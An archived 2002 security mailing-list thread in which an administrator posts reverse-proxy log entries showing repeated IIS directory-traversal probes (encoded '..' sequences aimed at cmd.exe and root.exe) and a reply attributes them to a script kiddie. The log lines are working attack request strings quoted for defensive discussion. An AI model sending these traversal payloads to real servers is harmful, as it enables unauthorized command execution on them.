OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Herman L. Knief (herman_at_knief.net)
Date: Thu Oct 10 2002 - 17:15:30 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Either that, or some script kiddie is trying out one of the many exploits
    on your site... not smart enough to realize that he's not hitting an IIS
    server.

    - Herman

    On Fri, 11 Oct 2002 mailinglistsbelfin.ch wrote:

    ->Hello
    ->
    ->our reverse proxy picked this up
    ->
    ->1034211881.427 22 217.11.99.90 TCP_MISS/503 1166 GET
    ->http://www/scripts/..%c1%1c../winnt/system32/cmd.exe? - NONE/- -
    ->1034211881.925 13 217.11.99.90 TCP_MISS/503 1166 GET
    ->http://www/scripts/..%c0%2f../winnt/system32/cmd.exe? - NONE/- -
    ->1034211882.393 19 217.11.99.90 TCP_MISS/503 1166 GET
    ->http://www/scripts/..%c0%af../winnt/system32/cmd.exe? - NONE/- -
    ->1034211882.852 10 217.11.99.90 TCP_MISS/503 1166 GET
    ->http://www/scripts/..%c1%9c../winnt/system32/cmd.exe? - NONE/- -
    ->1034211883.297 5 217.11.99.90 TCP_MISS/503 1168 GET
    ->http://www/scripts/..%%35%63../winnt/system32/cmd.exe? - NONE/- -
    ->1034211883.836 20 217.11.99.90 TCP_MISS/503 1164 GET
    ->http://www/scripts/..%%35c../winnt/system32/cmd.exe? - NONE/- -
    ->1034211887.664 22 217.11.99.90 TCP_MISS/503 1172 GET
    ->http://www/scripts/..%25%35%63../winnt/system32/cmd.exe? - NONE/- -
    ->1034211888.285 19 217.11.99.90 TCP_MISS/503 1164 GET
    ->http://www/scripts/..%252f../winnt/system32/cmd.exe? - NONE/- -
    ->1034215688.223 16 217.11.99.90 TCP_MISS/503 1116 GET
    ->http://www/scripts/root.exe? - NONE/- -
    ->1034215689.027 29 217.11.99.90 TCP_MISS/503 1112 GET
    ->http://www/MSADC/root.exe? - NONE/- -
    ->1034215689.564 13 217.11.99.90 TCP_MISS/503 1132 GET
    ->http://www/c/winnt/system32/cmd.exe? - NONE/- -
    ->1034215690.138 3 217.11.99.90 TCP_MISS/503 1132 GET
    ->http://www/d/winnt/system32/cmd.exe? - NONE/- -
    ->1034215690.962 20 217.11.99.90 TCP_MISS/503 1164 GET
    ->http://www/scripts/..%255c../winnt/system32/cmd.exe? - NONE/- -
    ->1034215691.552 27 217.11.99.90 TCP_MISS/503 1206 GET
    ->http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? -
    ->NONE/- -
    ->1034215692.265 19 217.11.99.90 TCP_MISS/503 1206 GET
    ->http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? -
    ->NONE/- -
    ->1034215693.017 10 217.11.99.90 TCP_MISS/503 1262 GET
    ->http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.
    ->./winnt/s
    ->
    ->Is there some new IIS/Windows worm spreading?
    ->
    ->Thanks,
    ->Philipp
    ->
    -> 

    -- 
Check the headers for your unsubscription address
For additional commands, e-mail: suse-security-helpsuse.com
Security-related bug reports go to securitysuse.de, not here